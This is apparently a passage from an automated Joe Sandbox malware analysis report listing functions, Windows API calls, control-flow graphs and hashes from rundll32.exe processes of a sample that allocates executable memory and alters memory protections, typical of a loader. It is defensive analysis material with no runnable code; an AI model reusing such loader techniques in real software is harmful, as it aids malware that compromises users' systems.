                                                                      Function 003D1428, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 169COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DdeQueryConvInfo.USER32(?,?,00000060), ref: 003D14BF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2109773757.0000000000393000.00000020.00020000.sdmp, Offset: 00393000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_393000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ConvInfoQuery
                                                                      • String ID: 0=$`
                                                                      • API String ID: 701148680-2555861442
                                                                      • Opcode ID: b4db6d67cc8babdf83d1d6461c9baf622cc0bfce56d874b93291c4b029b3ebfc
                                                                      • Instruction ID: a18dec4fa734df6733bd2722349b098e64425b59b65a3b022b1701a265ad18ac
                                                                      • Opcode Fuzzy Hash: b4db6d67cc8babdf83d1d6461c9baf622cc0bfce56d874b93291c4b029b3ebfc
                                                                      • Instruction Fuzzy Hash: 60519377A04219AFCB12EE6CF9859AE73BAEB48350F154022FD06DB744CA34DD05C7A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003980E8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(?), ref: 00398110
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2109773757.0000000000393000.00000020.00020000.sdmp, Offset: 00393000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_393000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$GetSystemMetrics
                                                                      • API String ID: 4116985748-3773086709
                                                                      • Opcode ID: 575b309d423836564a819a87146acd68736d1f54c64b71a92dd001becd235891
                                                                      • Instruction ID: 7f49374d5d7d87f613bacbf2dae54543a227f05975774854092eb4ad8f961536
                                                                      • Opcode Fuzzy Hash: 575b309d423836564a819a87146acd68736d1f54c64b71a92dd001becd235891
                                                                      • Instruction Fuzzy Hash: 23F0E2312162415ADF134B38ED86622368EE7C7330F608B33E1368A6E6DF398C479358
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Analysis Process: rundll32.exe PID: 2240 Parent PID: 2260 rundll32.exeCOMMON

                                                                      Executed Functions

                                                                      Function 00463928, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 136filememoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 463928-4639b4 call 4479dc 5 4639b6 0->5 6 4639bd-4639cf GetEnhMetaFileA 0->6 5->6 8 4639d1 6->8 9 4639d8-4639ec 6->9 8->9 10 463a0e-463ac5 VirtualAlloc 9->10 11 4639ee-463a0c 9->11 19 463acf-463ada 10->19 11->10 20 463b21-463b33 19->20 21 463adc-463b1f 19->21 22 463b75-463bac 20->22 23 463b35-463b73 20->23 21->19 23->22 23->23
                                                                      APIs
                                                                      • GetEnhMetaFileA.GDI32(trty55345), ref: 004639C2
                                                                      • VirtualAlloc.KERNELBASE(00000000,00466CB4,00001000,00000040), ref: 00463A8E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2111465783.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocFileMetaVirtual
                                                                      • String ID: trty55345$|lF
                                                                      • API String ID: 2643768156-462011533
                                                                      • Opcode ID: e22b54ecca05a132c9bdd28d062780c987cbddd84d4ea645cdb20cae0e4ab026
                                                                      • Instruction ID: 00c49ef07d34f105fcf4d433495aa085861750dc82918067735be55c91b233ef
                                                                      • Opcode Fuzzy Hash: e22b54ecca05a132c9bdd28d062780c987cbddd84d4ea645cdb20cae0e4ab026
                                                                      • Instruction Fuzzy Hash: 8561B5B0601A409FE740DF69ED86A0537A5F704309B12853AE589972B1FFF5A854CF4F
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00461638, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 25 461638-461641 26 461643 25->26 27 46164b-4616d1 DdeInitializeA call 461328 call 461a14 25->27 26->27 37 4616d6-4616eb 27->37
                                                                      APIs
                                                                      • DdeInitializeA.USER32(00000044,Function_0003E428,00000000,00000000), ref: 00461686
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2111465783.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize
                                                                      • String ID: Link
                                                                      • API String ID: 2538663250-2526951119
                                                                      • Opcode ID: 055aaab054cbac23bb404edc2ea0e6fc863d0eba1ab5203796eac30f3dd84bef
                                                                      • Instruction ID: d0869bd9eca08793bd1e582bf0eae279adb1ed532342e6143eed6f974ddeb4d0
                                                                      • Opcode Fuzzy Hash: 055aaab054cbac23bb404edc2ea0e6fc863d0eba1ab5203796eac30f3dd84bef
                                                                      • Instruction Fuzzy Hash: F21194706007006FD710EF76CD82B4E77E9AF45744B54583AF800E76A1FA79A901875E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 001CEB40, Relevance: 3.3, APIs: 2, Instructions: 252memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 39 1ceb40-1ceb93 VirtualProtect 40 1ceb95-1ceba1 39->40 41 1ceba6-1cec17 39->41 42 1cec3a-1cec85 call 1ce7a0 call 1ce7e0 40->42 41->42 59 1cec19-1cec37 41->59 49 1cec90-1cec9a 42->49 51 1cec9c-1ceca3 49->51 52 1cecf8-1ced4a call 1ce920 49->52 53 1ceced-1cecf6 51->53 54 1ceca5-1cecac 51->54 62 1ced4c-1ced50 52->62 63 1ced78-1ced7f 52->63 53->49 54->53 57 1cecae-1cecea call 1ce7e0 54->57 57->53 59->42 62->63 67 1ced52-1ced75 call 1ce880 62->67 64 1ced8a-1ced94 63->64 68 1cede6-1cee1b call 1cf000 64->68 69 1ced96-1ced9d 64->69 67->63 71 1ced9f-1ceda6 69->71 72 1ceddb-1cede4 69->72 71->72 75 1ceda8-1cedd9 call 1cee20 VirtualProtect 71->75 72->64 75->72
                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 001CEB8F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 001CEDD9
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2110708042.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_1b0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction ID: ecd011b93791675914b0f261dfd6c87fabb758fdaf927486f171ad3688439841
                                                                      • Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction Fuzzy Hash: 5FC1B9B5A00209DFCB48CF88C590EAEB7B6BF98304F148159E909AB355D735EE42CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00461A14, Relevance: 3.1, APIs: 2, Instructions: 56serviceCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 80 461a14-461a5a call 461ac8 86 461a70-461aa7 DdeCreateStringHandleA DdeNameService 80->86 87 461a5c-461a69 80->87 90 461aaf 86->90 87->86
                                                                      APIs
                                                                        • Part of subcall function 00461AC8: DdeFreeStringHandle.USER32(?,?), ref: 00461AE8
                                                                      • DdeCreateStringHandleA.USER32(?,00000000), ref: 00461A82
                                                                      • DdeNameService.USER32(?,00000000,00000000,00000001), ref: 00461A95
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2111465783.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$CreateFreeNameService
                                                                      • String ID:
                                                                      • API String ID: 374373348-0
                                                                      • Opcode ID: 2c890b520c8c8c453a459d838759a8254a88b7af164a4bc2f610b5fcdbda4da8
                                                                      • Instruction ID: 9d8230b8b9786ad70cb23cfc8f07923e913d2bc7bc66b4dc0d7f0c12b5e74525
                                                                      • Opcode Fuzzy Hash: 2c890b520c8c8c453a459d838759a8254a88b7af164a4bc2f610b5fcdbda4da8
                                                                      • Instruction Fuzzy Hash: 5E1182717112545BCB11EAA5C882A4A37ACAF89B04B5405BAFD00EB296E678ED008799
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 001CE620, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 91 1ce620-1ce66b call 1cea10 94 1ce66d-1ce677 call 1cea10 91->94 95 1ce67a-1ce6aa call 1ce390 VirtualAlloc 91->95 94->95
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001CE6A4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2110708042.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_1b0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction ID: 117c7387de3d5f51347830878ad0c65e219b67aa17df0d8a9b39fa1942965cea
                                                                      • Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction Fuzzy Hash: F8111F60D082C9EEEF01D7E89409BFFBFB55F21704F044098E5456B282D7BA97588BB6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Function 00428330, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetMonitorInfoA.USER32(?,?), ref: 00428361
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0042839D
                                                                      • GetSystemMetrics.USER32(00000001), ref: 004283A8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2111465783.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$InfoMonitor
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfo
                                                                      • API String ID: 4250584380-1428758730
                                                                      • Opcode ID: f469fe6cc5c65eba809066f83245f4e1bd66ea089cc0b94f912417a624723c54
                                                                      • Instruction ID: 637bc979103a918286e5382f01602372abea4ab8c4984eea237f75ea849c2a86
                                                                      • Opcode Fuzzy Hash: f469fe6cc5c65eba809066f83245f4e1bd66ea089cc0b94f912417a624723c54
                                                                      • Instruction Fuzzy Hash: AE11DF717023249FD320CF20AC44BABB7E8EB45B11F41453EED46D7240EBF5A8048BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004285AC, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EnumDisplayMonitors.USER32(?,?,?,?), ref: 004285E5
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0042860A
                                                                      • GetSystemMetrics.USER32(00000001), ref: 00428615
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2111465783.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$DisplayEnumMonitors
                                                                      • String ID: /}Au$EnumDisplayMonitors
                                                                      • API String ID: 1389147845-1105134141
                                                                      • Opcode ID: 1472a42c10fdf64708459078dabd989573ddb0b2d691415af7d2adfc035da151
                                                                      • Instruction ID: 560c2e5531f95041473ab5abdf9a332d975f3a18d6c562c3f42fe07e166bb06b
                                                                      • Opcode Fuzzy Hash: 1472a42c10fdf64708459078dabd989573ddb0b2d691415af7d2adfc035da151
                                                                      • Instruction Fuzzy Hash: 413150B2A02219AFDB00DFA5DC44AEF77BCAF55304F41452BF911E3240EB78D9148BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00428404, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 00428471
                                                                      • GetSystemMetrics.USER32(00000001), ref: 0042847C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2111465783.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoA
                                                                      • API String ID: 4116985748-2822609925
                                                                      • Opcode ID: b13fdcab3a368cb303cd6343f0466114add3bfd16c89175a002fa84954f8a16c
                                                                      • Instruction ID: 605c18e4e1bdf3c56052bce9c4db53a3c74fed138b051222b05aff1404ffe72f
                                                                      • Opcode Fuzzy Hash: b13fdcab3a368cb303cd6343f0466114add3bfd16c89175a002fa84954f8a16c
                                                                      • Instruction Fuzzy Hash: 0C11E4717023255FD720EF60AC44BABB7E8EB05320F41453EED459B240EBB4B84487AA
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004284D8, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 00428545
                                                                      • GetSystemMetrics.USER32(00000001), ref: 00428550
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2111465783.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoW
                                                                      • API String ID: 4116985748-1558784340
                                                                      • Opcode ID: f2edee6e7e9ac4a2c12a34016caccc270bd012c68818faee687fa0a0b208439d
                                                                      • Instruction ID: 99280014b4e7568ae5b78b7f4e1cfa4d9ca9bf2b7dd90ccdf1763cf76fa4773a
                                                                      • Opcode Fuzzy Hash: f2edee6e7e9ac4a2c12a34016caccc270bd012c68818faee687fa0a0b208439d
                                                                      • Instruction Fuzzy Hash: 6C11D671B02314AFD720DF65AC44BABB7E8EB05310F45493FED45D7240EBB5A8848BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00428298, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 004282E6
                                                                      • GetSystemMetrics.USER32(00000001), ref: 004282F8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2111465783.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromPoint
                                                                      • API String ID: 4116985748-3670600901
                                                                      • Opcode ID: 054316eae768099ac501fd47fccdcfd62b5ce6f092cb257fc86a27f1883456c4
                                                                      • Instruction ID: f632a035e8c56aece19070c7510d802e9804e06d05fa250d5db15c947f9699d3
                                                                      • Opcode Fuzzy Hash: 054316eae768099ac501fd47fccdcfd62b5ce6f092cb257fc86a27f1883456c4
                                                                      • Instruction Fuzzy Hash: 4101A231302328AFDB009F51EC44B9E7B55EB40B54F85403EFD048B251DBB6AC058BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00428170, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 004281C1
                                                                      • GetSystemMetrics.USER32(00000001), ref: 004281CD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2111465783.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromRect
                                                                      • API String ID: 4116985748-120404372
                                                                      • Opcode ID: d3b5d27fa188c06af7d19d4766c461fb26eb3d3432a6a9687b20f338ae7786bb
                                                                      • Instruction ID: 7300420cbd37d90105d4b3cf7da4562c34fb93397a177b564f82ba5817a4c9b0
                                                                      • Opcode Fuzzy Hash: d3b5d27fa188c06af7d19d4766c461fb26eb3d3432a6a9687b20f338ae7786bb
                                                                      • Instruction Fuzzy Hash: DB01A2313022249BD7109B14ED85B2BB794E741395F85806FEC04CB283DBB9EC528BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00462B38, Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DdeCreateStringHandleA.USER32(00000015,00000000), ref: 00462B7C
                                                                      • DdeClientTransaction.USER32(00000000,000000FF,00000000,?,?,00001034,000003E8,?), ref: 00462BA9
                                                                      • DdeGetLastError.USER32(00000015), ref: 00462BBB
                                                                      • DdeFreeStringHandle.USER32(00000015,?), ref: 00462BCD
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2111465783.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$ClientCreateErrorFreeLastTransaction
                                                                      • String ID:
                                                                      • API String ID: 2421758087-0
                                                                      • Opcode ID: 9f70acf482eb5e79ca196da2ae36f33cf545ac6692aa57f50a78d7a4637a6d96
                                                                      • Instruction ID: b5047ada5e6505b9d9b610dba3069aac40fc24b3776deae8b4cf26fcfcd54791
                                                                      • Opcode Fuzzy Hash: 9f70acf482eb5e79ca196da2ae36f33cf545ac6692aa57f50a78d7a4637a6d96
                                                                      • Instruction Fuzzy Hash: A3214A742046409FDB40DF59C9C1E5A77E8EB49310F158196F988CF2A6E779EC40CB6A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00461428, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 169COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DdeQueryConvInfo.USER32(?,?,00000060), ref: 004614BF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2111465783.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ConvInfoQuery
                                                                      • String ID: 0F$`
                                                                      • API String ID: 701148680-3237207667
                                                                      • Opcode ID: 5209b332fedc4f6cafecc28ee418f67ac4b0665a7af05f7be5604bd4cc67bf07
                                                                      • Instruction ID: db70940b4a1f0617aeeac80f8a0c91bf787b1828615b15b28606ddd46ecba5aa
                                                                      • Opcode Fuzzy Hash: 5209b332fedc4f6cafecc28ee418f67ac4b0665a7af05f7be5604bd4cc67bf07
                                                                      • Instruction Fuzzy Hash: 13518476B006199BCB00DE5DD9854AF73B9AB48354F1D4026FD06D7360EA38DD02C7AB
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004280E8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(?), ref: 00428110
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2111465783.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$GetSystemMetrics
                                                                      • API String ID: 4116985748-3773086709
                                                                      • Opcode ID: 4c5f92fa1d7377d91b8f4fbca774eb960f9bdc49951ee80ed77666db2558805d
                                                                      • Instruction ID: 0ee67d0bb69f832fec1fca06a4eed47d1578d3d3e795e0a9096b3779754e9213
                                                                      • Opcode Fuzzy Hash: 4c5f92fa1d7377d91b8f4fbca774eb960f9bdc49951ee80ed77666db2558805d
                                                                      • Instruction Fuzzy Hash: 4AF0F0303072204ADB105F38BE8163E7546A782374FE08A3FE126466D2DE7C8823824E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Analysis Process: rundll32.exe PID: 1068 Parent PID: 2240 rundll32.exeCOMMON

                                                                      Executed Functions

                                                                      Function 00463928, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 136filememoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 463928-4639b4 call 4479dc 5 4639b6 0->5 6 4639bd-4639cf GetEnhMetaFileA 0->6 5->6 8 4639d1 6->8 9 4639d8-4639ec 6->9 8->9 10 463a0e-463ac5 VirtualAlloc 9->10 11 4639ee-463a0c 9->11 19 463acf-463ada 10->19 11->10 20 463b21-463b33 19->20 21 463adc-463b1f 19->21 22 463b75-463bac 20->22 23 463b35-463b73 20->23 21->19 23->22 23->23
                                                                      APIs
                                                                      • GetEnhMetaFileA.GDI32(trty55345), ref: 004639C2
                                                                      • VirtualAlloc.KERNELBASE(00000000,00466CB4,00001000,00000040), ref: 00463A8E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.2112517285.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocFileMetaVirtual
                                                                      • String ID: trty55345$|lF
                                                                      • API String ID: 2643768156-462011533
                                                                      • Opcode ID: e22b54ecca05a132c9bdd28d062780c987cbddd84d4ea645cdb20cae0e4ab026
                                                                      • Instruction ID: 00c49ef07d34f105fcf4d433495aa085861750dc82918067735be55c91b233ef
                                                                      • Opcode Fuzzy Hash: e22b54ecca05a132c9bdd28d062780c987cbddd84d4ea645cdb20cae0e4ab026
                                                                      • Instruction Fuzzy Hash: 8561B5B0601A409FE740DF69ED86A0537A5F704309B12853AE589972B1FFF5A854CF4F
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00461638, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 25 461638-461641 26 461643 25->26 27 46164b-4616d1 DdeInitializeA call 461328 call 461a14 25->27 26->27 37 4616d6-4616eb 27->37
                                                                      APIs
                                                                      • DdeInitializeA.USER32(00000044,Function_0003E428,00000000,00000000), ref: 00461686
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.2112517285.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize
                                                                      • String ID: Link
                                                                      • API String ID: 2538663250-2526951119
                                                                      • Opcode ID: 055aaab054cbac23bb404edc2ea0e6fc863d0eba1ab5203796eac30f3dd84bef
                                                                      • Instruction ID: d0869bd9eca08793bd1e582bf0eae279adb1ed532342e6143eed6f974ddeb4d0
                                                                      • Opcode Fuzzy Hash: 055aaab054cbac23bb404edc2ea0e6fc863d0eba1ab5203796eac30f3dd84bef
                                                                      • Instruction Fuzzy Hash: F21194706007006FD710EF76CD82B4E77E9AF45744B54583AF800E76A1FA79A901875E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 001AEB40, Relevance: 3.3, APIs: 2, Instructions: 252memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 39 1aeb40-1aeb93 VirtualProtect 40 1aeba6-1aec17 39->40 41 1aeb95-1aeba1 39->41 42 1aec3a-1aec85 call 1ae7a0 call 1ae7e0 40->42 57 1aec19-1aec37 40->57 41->42 49 1aec90-1aec9a 42->49 51 1aecf8-1aed4a call 1ae920 49->51 52 1aec9c-1aeca3 49->52 61 1aed78-1aed7f 51->61 62 1aed4c-1aed50 51->62 55 1aeced-1aecf6 52->55 56 1aeca5-1aecac 52->56 55->49 56->55 60 1aecae-1aecea call 1ae7e0 56->60 57->42 60->55 66 1aed8a-1aed94 61->66 62->61 65 1aed52-1aed75 call 1ae880 62->65 65->61 69 1aede6-1aee1b call 1af000 66->69 70 1aed96-1aed9d 66->70 73 1aeddb-1aede4 70->73 74 1aed9f-1aeda6 70->74 73->66 74->73 77 1aeda8-1aedd9 call 1aee20 VirtualProtect 74->77 77->73
                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 001AEB8F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 001AEDD9
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.2111956527.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_190000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction ID: 706e5a90f9f374382c64c12d0bf5b4a0c6b9d2f991e22b97a5e8e116955e591c
                                                                      • Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction Fuzzy Hash: C9C18AB9A00209DFCB48CF98C590EAEB7B5BF88314F148159E9199B355D735EE42CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00461A14, Relevance: 3.1, APIs: 2, Instructions: 56serviceCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 80 461a14-461a5a call 461ac8 86 461a70-461aa7 DdeCreateStringHandleA DdeNameService 80->86 87 461a5c-461a69 80->87 90 461aaf 86->90 87->86
                                                                      APIs
                                                                        • Part of subcall function 00461AC8: DdeFreeStringHandle.USER32(?,?), ref: 00461AE8
                                                                      • DdeCreateStringHandleA.USER32(?,00000000), ref: 00461A82
                                                                      • DdeNameService.USER32(?,00000000,00000000,00000001), ref: 00461A95
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.2112517285.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$CreateFreeNameService
                                                                      • String ID:
                                                                      • API String ID: 374373348-0
                                                                      • Opcode ID: 2c890b520c8c8c453a459d838759a8254a88b7af164a4bc2f610b5fcdbda4da8
                                                                      • Instruction ID: 9d8230b8b9786ad70cb23cfc8f07923e913d2bc7bc66b4dc0d7f0c12b5e74525
                                                                      • Opcode Fuzzy Hash: 2c890b520c8c8c453a459d838759a8254a88b7af164a4bc2f610b5fcdbda4da8
                                                                      • Instruction Fuzzy Hash: 5E1182717112545BCB11EAA5C882A4A37ACAF89B04B5405BAFD00EB296E678ED008799
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 001AE620, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
